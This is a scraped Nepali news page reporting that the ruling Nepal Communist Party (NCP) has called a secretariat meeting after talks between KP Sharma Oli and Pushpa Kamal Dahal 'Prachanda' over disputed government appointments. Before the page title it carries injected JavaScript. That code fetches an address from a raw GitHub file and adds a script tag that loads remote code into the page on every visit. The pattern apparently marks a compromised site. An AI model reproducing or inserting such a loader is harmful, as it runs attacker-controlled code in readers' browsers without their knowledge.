;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); नेकपाको सचिवालय बैठक भोलि ४ बजे बस्ने – जुनेली न्युज
बुधबार, असार १२, २०८२
  • होमपेज
  • नेकपाको सचिवालय बैठक भोलि ४ बजे बस्ने
राजनीति

नेकपाको सचिवालय बैठक भोलि ४ बजे बस्ने

असोज १६,

काठमाडौं । सत्तारुढ नेपाल कम्युनिस्ट पार्टी (नेकपा) ले भोलि दिउँसो ४ बजेका लागि सचिवालय बैठक बोलाएको छ। आज अध्यक्षद्वय केपी शर्मा ओली र पुष्पकमल दाहाल प्रचण्डबीच भएको छलफलमा सचिवालय बैठक बोलाउने सहमति हो।

प्रधानमन्त्री समेत रहेका अध्यक्ष ओलीलाई भेट्न प्रचण्ड आज बिहान १० बजे बालुवाटार पुगेका थिए। उनीहरूबीच करीब एक घण्टा कुराकानी भएको थियो।

सरकारले बिहीबार युवराज खतिवडालाई राजदूतमा सिफारिस गर्ने र शंकरदास बैरागीलाई मुख्यसचिव बनाउने लगायतका निर्णय पार्टीमा छलफल नगरेर गरेको भन्दै दाहाल लगायत सचिवालयका नेताहरू असन्तुष्ट बनेका छन्।

भोलि बस्ने सचिवालय बैठकमा सो विषय र मन्त्रिपरिषद् पुर्नगठनका सम्बन्धमा छलफल हुने बताइएको छ।

फेसबुक प्रतिक्रियाहरु